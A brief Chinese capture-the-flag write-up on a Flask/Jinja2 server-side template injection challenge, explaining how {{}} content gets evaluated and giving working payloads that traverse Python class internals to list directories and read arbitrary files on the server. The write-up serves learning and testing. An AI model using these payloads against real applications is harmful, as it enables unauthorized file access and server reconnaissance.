打开链接
只有一行字
提示这是python模板注入
也就是说可能是jinjia2、djingo、tornado中的一个模板
这里涉及到flask的ssti漏洞(服务端模板注入)。
简单点说就是,在使用flask/jinja2的模板渲染函数render_template_string的同时,使
用%s来替换字符串的时候,会把字符串中被{{}}包围内容当作变量解析。
举个例子
请求:xxxxxx.xxx/{{ 10*10 }}
响应:xxxxx.xxx/{{100}} Not Found!
原理讲解:
https://www.cnblogs.com/tr1ple/p/9415641.html
https://xz.aliyun.com/t/3679#toc-0
ssti:
https://www.cnblogs.com/R3col/p/12746485.html
总结
这道题只用了下边俩方法:
查看文件(ls)
{{''.__class__.__mro__[-1].__subclasses__()[71].__init__.__globals__['os'].listdir('./')}}
这里的./是路径
文件读取:
{{''.__class__.__mro__[-1].__subclasses__()[40]('filename').read()}}
这里的filename是文件名